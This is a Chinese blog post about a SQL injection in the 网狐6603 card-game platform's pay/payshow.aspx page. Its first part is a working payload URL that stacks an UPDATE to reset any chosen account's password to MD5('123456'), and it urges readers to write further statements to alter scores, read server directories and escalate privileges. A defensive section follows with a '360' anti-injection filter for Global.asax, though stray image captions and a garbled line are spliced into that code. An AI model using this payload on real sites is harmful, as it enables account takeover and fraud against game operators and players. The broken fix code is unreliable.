先看下网站是否存在pay/payshow.aspx页面。

构造

url=http://192.168.1.8/pay/payshow.aspx?orderid=1';UPDATE%20QPAccountsDB.dbo.Accounts

Info%20SET%20LogonPass%20=%20'E10ADC3949BA59ABBE56E057F20F883E'%20WHER

E%20accounts%20=用户名%20--

E10ADC3949BA59ABBE56E057F20F883E=MD5(123456)

直接访问URL,看看密码是不是变成123456了 。

自己构造别的语句 ,可以修改任意分数 ,读取服务器目录,提权...........

其他页面也有这样的BUG 。

以下是360通用sql防注入方法。

-----------------使用方法------------------------------------------------------------------

1.将App_Code目录拷贝到web根目录

假如已经存在App_Code目录,那直接把App_Code目录里的360safe.cs文件拷贝到当前

App_Code目录即可。

2.将Global.asax文件拷贝到web根目录

假如已经存在Global.asax文件,那直接把下面这段代码

voidApplication_BeginRequest(objectsender,EventArgse)

{

if(Request.Cookies!=null)

{

if(safe_360.CookieData())

{

网狐6603 SQL注入任意修改数据 网狐 网站 网狐6603 棋牌技术  第1张

Response.Write("您提交的Cookie数据有恶意字符!");

Response.End();

}

}

if(Request.UrlReferrer!=null)

{

if(safe_360.referer()){

Response.Write("您提交的Referrer数据有恶意字符!");

Response.End();

}

}

if(Request.RequestType.ToUpper()=="POST")

 

- `3 ?! L6 J4 t& n% Z+ U

{

if(safe_360.PostData())

{

Response.Write("您提交的Post数据有恶意字符!");

Response.End();

}

}

if(Request.RequestType.ToUpper()=="GET")

{

if(safe_360.GetData())

{

Response.Write("您提交的Get数据有恶意字符!");

Response.End();

}

网狐6603 SQL注入任意修改数据 网狐 网站 网狐6603 棋牌技术  第2张

}

}

拷贝到当前的Global.asax文件里保存 。

 

 

修复方法:安装个安全狗就OK了

未经允许不得转载! 作者:棋牌源码网,转载或复制请以超链接形式并注明出处棋牌源码网

原文地址:《网狐6603 SQL注入任意修改数据》发布于:2021-08-06